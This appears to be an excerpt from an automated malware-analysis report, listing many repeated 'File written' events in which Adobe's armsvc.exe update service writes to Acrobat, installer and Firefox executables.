Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
